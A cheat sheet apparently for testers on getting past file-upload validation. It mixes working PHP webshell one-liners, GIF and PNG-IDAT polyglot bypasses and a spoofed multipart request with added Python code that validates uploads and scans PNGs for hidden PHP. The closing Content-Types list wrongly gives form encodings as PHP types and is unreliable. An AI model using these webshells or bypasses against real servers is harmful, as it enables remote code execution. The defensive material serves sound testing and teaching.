File Upload Tricks
When uploading files, check which of the following the server validates:
File extension
Which server-side extensions are allowed? Try:
php phtml php4
Stacking / double extension:
.php.png .%20.php
GIF polyglot (a GIF header followed by PHP, saved as shell.php):
GIF89a;
<?php
system($_GET['cmd']);
?>
Advanced GIF polyglot: the same body sent in a multipart part whose filename is web.php but whose Content-Type claims an image
Content-Disposition: form-data; name="upload"; filename="web.php"
Content-Type: image/png
GIF89a;
<?php
system($_GET['cmd']);
?>
Content-Type header
Can a file with a server-side extension such as .php be uploaded at all?
- If yes, change the Content-Type header to an image type (e.g. image/png): a type check is satisfied, but the file still runs as PHP because the server executes by extension.
Does the server validate the Content-Type header, e.g. disallow application/json?
Magic bytes (file hex value)
Does the server check the file signature?
If not, the signature can be set with a hex editor such as
hexedit
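The three checks above (extension, declared Content-Type, file signature) only hold up when the server applies them together and on a normalized file name. The validator below is an added example written for this page, not code from the page or from any project it links. It assumes a PHP-style stack in which the extensions php, phtml and php4 are executed (the page's list; extend it for your server) and an allow-list of image types as the only accepted uploads; SAMPLE_PNG and SAMPLE_GIF_POLYGLOT are constructed bodies for the demonstration.

```python
"""Server-side upload validation: name, declared type and file signature checked together (added example)."""
import os
import re
import secrets
import urllib.parse

# Allow-list: extension -> (accepted magic-byte prefixes, accepted declared Content-Types)
ALLOWED = {
    "png": ((b"\x89PNG\r\n\x1a\n",), {"image/png"}),
    "jpg": ((b"\xff\xd8\xff",), {"image/jpeg"}),
    "jpeg": ((b"\xff\xd8\xff",), {"image/jpeg"}),
    "gif": ((b"GIF87a", b"GIF89a"), {"image/gif"}),
}

# Extensions the web server hands to the PHP interpreter (the page's list; extend for your stack)
SCRIPT_EXTS = {"php", "phtml", "php4"}

# A PHP open tag has no business inside image data, whatever the headers claim
PHP_OPEN_TAG = re.compile(rb"<\?php", re.IGNORECASE)

# Constructed sample bodies for the demo below (not real uploads)
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_GIF_POLYGLOT = b"GIF89a;\n<?php echo 1; ?>"


def normalize_name(filename):
    """Undo name tricks before any extension check: percent-decoding
    (shell.%20.php -> 'shell. .php'), path components, NUL bytes, trailing dots/spaces."""
    name = urllib.parse.unquote(filename).replace("\x00", "")
    name = os.path.basename(name.replace("\\", "/"))
    return name.strip().rstrip(". ")


def validate_upload(filename, content_type, data):
    """Return (accepted, detail): the reason on rejection, the extension on success."""
    parts = [p.strip().lower() for p in normalize_name(filename).split(".")]
    if len(parts) < 2 or not parts[0]:
        return False, "missing or empty extension"
    # Stacked extensions: a script extension anywhere after the base name is rejected,
    # so shell.php.png, shell.png.php and shell. .php all fail here
    if any(p in SCRIPT_EXTS for p in parts[1:]):
        return False, "script extension in name"
    ext = parts[-1]
    if ext not in ALLOWED:
        return False, f"extension not allowed: {ext}"
    magics, types = ALLOWED[ext]
    # The declared Content-Type is client-controlled; it still has to agree with the extension
    declared = content_type.split(";")[0].strip().lower()
    if declared not in types:
        return False, f"content-type {declared} does not match .{ext}"
    # Magic bytes must match the format the extension claims
    if not any(data.startswith(m) for m in magics):
        return False, "file signature does not match extension"
    # A valid GIF header followed by PHP is still a polyglot: scan the body as well
    if PHP_OPEN_TAG.search(data):
        return False, "PHP open tag inside image data"
    return True, ext


def stored_name(ext):
    """Never reuse the client's name on disk: random name plus the validated extension."""
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    cases = [
        ("web.php", "image/png", SAMPLE_GIF_POLYGLOT),
        ("shell.php.png", "image/png", SAMPLE_PNG),
        ("shell.%20.php", "image/png", SAMPLE_PNG),
        ("photo.png", "application/octet-stream", SAMPLE_PNG),
        ("photo.png", "image/png", SAMPLE_GIF_POLYGLOT),
        ("photo.gif", "image/gif", SAMPLE_GIF_POLYGLOT),
        ("photo.png", "image/png", SAMPLE_PNG),
    ]
    for name, ctype, body in cases:
        ok, detail = validate_upload(name, ctype, body)
        verdict = "ACCEPT as " + stored_name(detail) if ok else "REJECT: " + detail
        print(f"{name:16} {ctype:26} -> {verdict}")
```

A GIF polyglot passes the signature check on its own, which is why the name is checked for a script extension in every position and the body is scanned for an open tag. The complement to these checks is storing uploads under the server-generated name in a directory the web server never executes scripts from.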
PHP Function Exploit
imagecopyresampled
imagecreatefromstring
These GD functions re-encode the uploaded image, so a payload kept in plain bytes, comments or metadata does not survive.
Solution: hide the webshell in the IDAT chunk of a PNG so that it is still present after re-encoding:
https://github.com/huntergregal/PNG-IDAT-Payload-Generator/tree/master
python3 generate.py -m php -o webshell.png
Rename to webshell.png.php
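To see why the IDAT trick gets past a check that only looks at metadata, and how to look for it, here is an added example written for this page (not code from the page or from the linked generator). It builds small constructed PNG files with a build_png helper and scans them in three places: the raw file bytes, every non-IDAT chunk, and the decompressed IDAT pixel stream. The payload b"<?php echo 1; ?>" is a constructed marker, not a webshell.

```python
"""Inspect PNG uploads for a PHP open tag hidden in chunks or IDAT pixel data (added example)."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
PHP_TAG = b"<?php"


def make_chunk(ctype, body):
    """Serialize one PNG chunk: length, type, body, CRC over type+body."""
    return (struct.pack(">I", len(body)) + ctype + body
            + struct.pack(">I", zlib.crc32(ctype + body)))


def build_png(row, level=9, text=None):
    """Constructed sample: a 1-row 8-bit grayscale PNG whose pixel bytes are `row`.

    level=0 stores the scanline uncompressed, so the pixel bytes also appear
    verbatim in the file; `text` adds a tEXt chunk (where metadata payloads hide).
    """
    ihdr = struct.pack(">IIBBBBB", len(row), 1, 8, 0, 0, 0, 0)  # width, height=1, depth 8, grayscale
    png = PNG_SIG + make_chunk(b"IHDR", ihdr)
    if text is not None:
        png += make_chunk(b"tEXt", b"Comment\x00" + text)
    png += make_chunk(b"IDAT", zlib.compress(b"\x00" + row, level))  # filter byte 0 + pixels
    return png + make_chunk(b"IEND", b"")


def png_chunks(data):
    """Yield (type, body) for each chunk, checking the signature, lengths and every CRC."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if pos + 12 + length > len(data):
            raise ValueError(f"truncated {ctype!r} chunk")
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        yield ctype, body
        pos += 12 + length
        if ctype == b"IEND":
            break


def scan_png(data):
    """Return where the PHP open tag was found: raw file, a named chunk, or the decompressed pixels."""
    findings = []
    if PHP_TAG in data:
        findings.append("raw bytes")
    idat = b""
    for ctype, body in png_chunks(data):
        if ctype == b"IDAT":
            idat += body  # IDAT may be split over several chunks; concatenate before inflating
        elif PHP_TAG in body:
            findings.append(f"{ctype.decode('ascii')} chunk")
    if PHP_TAG in zlib.decompress(idat):
        findings.append("decompressed IDAT")
    return findings


if __name__ == "__main__":
    samples = {
        "clean": build_png(bytes(range(32))),
        "tag in tEXt chunk": build_png(bytes(16), text=b"<?php echo 1; ?>"),
        "tag in pixel data": build_png(b"\x00" * 8 + b"<?php echo 1; ?>" + b"\x00" * 8),
    }
    for label, png in samples.items():
        print(f"{label}: {scan_png(png) or 'nothing found'}")
```

Re-encoding with GD removes the tEXt case but keeps pixel values, and the linked generator chooses pixel values so that the tag reappears in the re-encoded compressed stream. The defensive counterpart is therefore to scan the decompressed pixels before storing, to re-encode server-side and scan the output file as well, and to never serve uploads from a location where a .php suffix would be executed.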
Shell exec
PHP functions that run a shell command:
shell_exec(), exec(), system()
Examples (the variants ending in 2>&1 also return the command's error output):
<?php echo shell_exec($_GET['command']); ?>
<?php echo exec($_GET['command']); ?>
<?php echo system($_GET['command']); ?>
<?php echo exec($_GET['e'].' 2>&1'); ?>
<?php system($_GET['e'].' 2>&1'); ?>
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>
Content-Types of Common Files
Pictures: image/png, image/jpeg, image/gif
JSON: application/json
PHP: application/x-php, application/x-www-form-urlencoded, multipart/form-data, application/octet-stream
TXT: text/plain
XML: application/xml, text/xml
HTML: text/html
JavaScript: text/javascript, application/javascript
PDF: application/pdf
Audio: audio/mpeg, audio/wav
Video: video/mp4, video/quicktime